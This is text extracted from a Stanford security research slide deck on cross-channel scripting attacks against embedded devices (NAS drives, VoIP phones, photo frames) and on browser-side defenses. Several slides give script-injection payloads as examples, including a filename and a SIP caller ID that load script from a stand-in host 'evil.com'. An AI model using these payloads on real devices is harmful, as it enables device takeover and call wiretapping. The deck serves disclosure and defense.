SLIDE 1 S t a n f
d C
p u t e r S e c u r i t y L a b
Cross-Channel Scripting
Impact on Embedded Web Interfaces
Hristo Bojinov Elie Bursztein Dan Boneh Stanford Computer Security Lab
SLIDE 2 Protocol A
Cross-channel scripting
Service A Service B
Protocol B
Vulnerable System
State
SLIDE 3 Protocol A
Cross-channel scripting
Service A Service B
Protocol A Protocol B
Injection e.g. iCal
Vulnerable System
State
SLIDE 4 Protocol A
Cross-channel scripting
Service A Service B
Protocol A Protocol B
Injection e.g. iCal
Vulnerable System
State
SLIDE 5 Protocol A
Cross-channel scripting
Service A Service B
Protocol A Protocol B
Injection e.g. iCal
Vulnerable System
State
SLIDE 6 Protocol A
Cross-channel scripting
Service A Service B
Protocol A Protocol B Protocol B
Execution Injection e.g. iCal e.g. HTTP
Vulnerable System
State
SLIDE 7 Protocol A
Cross-channel scripting
XCS: a pervasive attack class
- secure services ≠ secure system
Service A Service B
Protocol A Protocol B Protocol B
Execution Injection e.g. iCal e.g. HTTP
Vulnerable System
State
SLIDE 8 LaCie Ethernet disk mini
- Share access control
- Web interface
- Public FTP
Cross-channel scripting
SLIDE 9 Cross-channel scripting
FTP server Attacker
Upload a file: <script>..</script>.pdf
NAS
SLIDE 10 file system
Cross-channel scripting
FTP server Attacker
Upload a file: <script>..</script>.pdf
NAS
SLIDE 11 Web App file system
Cross-channel scripting
FTP server
Admin Browser
Reflect the filename: <script>..</script>.pdf
Attacker
Upload a file: <script>..</script>.pdf
NAS
Admin Browser
SLIDE 12
Cross-channel scripting
SLIDE 13 Talk overview
Part 1: Many examples of XCS
- Phones: 5 XCS vulnerabilities in 2 phones
- Embedded: 23 devices, 26 XCS vulnerabilities
- RESTful APIs: 2 major APIs, 2 XCS vulnerabilities
SLIDE 14 Talk overview
Part 1: Many examples of XCS
- Phones: 5 XCS vulnerabilities in 2 phones
- Embedded: 23 devices, 26 XCS vulnerabilities
- RESTful APIs: 2 major APIs, 2 XCS vulnerabilities
Part 2: Defenses against XCS
SLIDE 15 S t a n f
d C
p u t e r S e c u r i t y L a b
More XCS Examples
SLIDE 16
Embedded web interfaces?
SLIDE 17 Embedded vs. public web servers
75 150 225 300 2008 2009 2010 2011 2012 2013 Growth
Internet Embedded (NAS and photo frame only)
Data :
- Parks associates
- Netcraft
( M i l l i
s )
SLIDE 18
Web management interfaces
Managing embedded devices via a web interface: ✓ Easier for users ✓ Cheaper for vendors
SLIDE 19 Recipe for a disaster
Vendors build their own web applications
- Standard web server (sometimes)
- Custom web application stack
- Weak web security
New features/services added at a fast pace
- Vendors compete on number of services in product
- Interactions between services ➽ vulnerabilities
SLIDE 20
Outcome
Vulnerabilities in every device we audited
SLIDE 21 VoIP phone
- Linksys SPA942
- Web interface
- SIP support
- Call logs
SIP XCS
SLIDE 22
SIP XCS
SLIDE 23 SIP XCS
1 Attacker makes a call as
“<script src="//evil.com/"></script>”
SLIDE 24 2 Administrator accesses web interface
SIP XCS
1 Attacker makes a call as
“<script src="//evil.com/"></script>”
SLIDE 25 2 Administrator accesses web interface
SIP XCS
Internet
1 Attacker makes a call as 3 Payload executes
“<script src="//evil.com/"></script>”
SLIDE 26
SIP XCS
Outcome: phone reconfiguration, VoIP wiretapping...
SLIDE 27 WiFi photo frame
- Samsung SPF85V
- RSS / URL feed
- Windows Live
- WMV / AVI
Photo frame XCS
SLIDE 28 Internet
Photo frame XCS
SLIDE 29 Internet
Photo frame XCS
1 Attacker infects via CSRF
SLIDE 30 Internet
Photo frame XCS
1 Attacker infects via CSRF 2 User connects to manage
SLIDE 31 Internet
Photo frame XCS
1 Attacker infects via CSRF 2 User connects to manage 3 Payload executes
Frame Error! Call Support: 1-900-PWNED
SLIDE 32
Devices as stepping stones
SLIDE 33 Devices as stepping stones
1 Administer the device
SLIDE 34 Devices as stepping stones
Internet
1 Administer the device 2 Browse internet
SLIDE 35 Devices as stepping stones
Internet
1 Administer the device 2 Browse internet 3 T r i g g e r P O S T ( e . g . v i a A d s )
SLIDE 36 Devices as stepping stones
Internet
2 Browse internet 3 T r i g g e r P O S T ( e . g . v i a A d s ) 4 Infect the device
SLIDE 37 Devices as stepping stones
5 Access files
SLIDE 38 Devices as stepping stones
5 Access files 6 Send malicious payload
SLIDE 39 Devices as stepping stones
5 Access files 6 Send malicious payload 7 Attack local network
SLIDE 40 SOHO NAS
- Buffalo LS-CHL
- BitTorrent support!
Another boring NAS device?
SLIDE 41 Massive exploitation
Internet
SLIDE 42 Massive exploitation
Internet
Create a bad torrent Famous_movie.torrent
SLIDE 43 Massive exploitation
Internet
SLIDE 44 Massive exploitation
Internet
SLIDE 45 Massive exploitation
Internet
SLIDE 46
Peer-to-peer XCS!
SLIDE 47 S t a n f
d C
p u t e r S e c u r i t y L a b
Defenses
SLIDE 48 Protocol A
Cross-channel scripting
Service A Service B
Protocol A Protocol B Protocol B
Execution Injection
Vulnerable System
SLIDE 49 Protocol A
Cross-channel scripting
Service A Service B
Protocol A Protocol B Protocol B
Execution Injection
Vulnerable System
Difficult
SLIDE 50 Protocol A
Cross-channel scripting
Service A Service B
Protocol A Protocol B Protocol B
Execution Injection
Vulnerable System
Difficult Feasible
SLIDE 51
Security policies in browsers
SLIDE 52 Security policies in browsers
Strict Transport Security
- ForceHTTPS [JB’08]
- Stateful, and site-wide
- Recently adopted by PayPal
- Several browser implementations
SLIDE 53 Security policies in browsers
Same Origin Mutual Approval [OWvOS’08]
- Manifest delivery, stateless, site-wide
SLIDE 54 Security policies in browsers
Same Origin Mutual Approval [OWvOS’08]
- Manifest delivery, stateless, site-wide
Mozilla Content Security Policy
- Header delivery, stateless, fine-grained
SLIDE 55 Security policies in browsers
Same Origin Mutual Approval [OWvOS’08]
- Manifest delivery, stateless, site-wide
Mozilla Content Security Policy
- Header delivery, stateless, fine-grained
SiteFirewall
- Header delivery, stateful, site-wide
SLIDE 56 SiteFirewall
SiteFirewall (a Firefox extension), prevents internal websites from accessing the Internet.
Internet
SLIDE 57 SiteFirewall
SiteFirewall (a Firefox extension), prevents internal websites from accessing the Internet.
Internet
SLIDE 58
SiteFirewall
Injected script can issue requests at will: <script src=”http://evil.com”> Before
SLIDE 59
SiteFirewall
Page interactions with the Internet blocked. After
SLIDE 60
Thinking beyond cookies
SLIDE 61 Thinking beyond cookies
Policy delivery mechanisms:
- Manifest files, cookies, custom headers, DNS, certs
SLIDE 62 Thinking beyond cookies
Policy delivery mechanisms:
- Manifest files, cookies, custom headers, DNS, certs
Different types of browser state:
- Cookies for web application state
- Policy store for web site security policies
SLIDE 63 S t a n f
d C
p u t e r S e c u r i t y L a b
Conclusion
SLIDE 64
A growing threat
As seen on Twitter...
SLIDE 65
A growing threat
... and a smartphone near you.
SLIDE 66 Conclusion
Rise of multi-protocol devices: XCS Rise of browser-OS: 24x7 exploitability
Thanks to Eric Lovett and Parks Associates!
SLIDE 67 Conclusion
Rise of multi-protocol devices: XCS Rise of browser-OS: 24x7 exploitability Recommendations
- HTTP: cross-site policy standard
- Browser: security policy store (non-cookie)
Thanks to Eric Lovett and Parks Associates!
SLIDE 68 S t a n f
d C
p u t e r S e c u r i t y L a b
Questions?
http://seclab.stanford.edu
